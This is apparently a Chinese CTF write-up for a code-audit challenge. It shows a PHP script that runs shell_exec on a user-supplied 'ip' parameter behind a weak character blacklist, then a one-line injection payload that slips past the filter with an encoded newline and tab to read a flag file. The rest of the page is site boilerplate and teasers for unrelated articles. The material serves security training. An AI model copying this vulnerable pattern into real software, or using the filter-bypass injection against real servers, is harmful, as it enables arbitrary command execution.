【Code-Audit-Challenges】Challenge 6:命令执行、waf绕过

0x01 题目

<?php
if(isset($_REQUEST[ 'ip' ])) {
    $target = trim($_REQUEST[ 'ip' ]);
    $substitutions = array(
        '&'  => '',
        ';'  => '',
        '|' => '',
        '-'  => '',
        '$'  => '',
        '('  => '',
        ')'  => '',
        '`'  => '',
        '||' => '',
    );
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );
    $cmd = shell_exec( 'ping  -c 4 ' . $target );
        echo $target;
    echo  "<pre>{$cmd}</pre>";
}
show_source(__FILE__);

0x02 解题

读代码了解到这题是一个绕过黑名单完成命令代码执行的题目。直接利用%0a来换行,%09当做空格就好了

paylod如下:

?ip=127.0.0.1%0acat%09flag.txt
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • Android - 收藏集
    Android 自定义View的各种姿势1 Activity的显示之ViewRootImpl详解 Activity...
    passiontim阅读 175,313评论 25 709
  • 减少 WAF 漏报的 8 种方法 !
    近十年来,WAF 已经逐渐发展成熟,被软件行业接受并成为无数企业保护应用的不二选择。很多大型企业甚至相继亲自设计或...
    OneAPM阅读 4,565评论 0 1
  • 绿豆可解毒消暑,3类人需忌食!
    夏天酷热难当,我们可以适当的吃些绿豆来消暑排毒,绿豆的吃法很多,如:绿豆粥、绿豆汤,还有做成绿豆沙来食用。菜宝宝提...
    鑫的传说阅读 5,055评论 3 2
  • 无标题文章
    2017-4-29 今天晚上和班上的同学排练班级风采大赛的节目。七点左右,下起了小雨。雨越下越大,班上共四十多个人...
    瑶鬼阅读 1,495评论 0 0
  • 梦里有个岔路口
    梦里有个岔路口 向左,是8岁那年种下的梧桐树 向右,是父母背影下的遮羞布 我呓语连连,念念不忘梧桐树 我泪眼濛濛,...
    _花言_阅读 2,338评论 0 1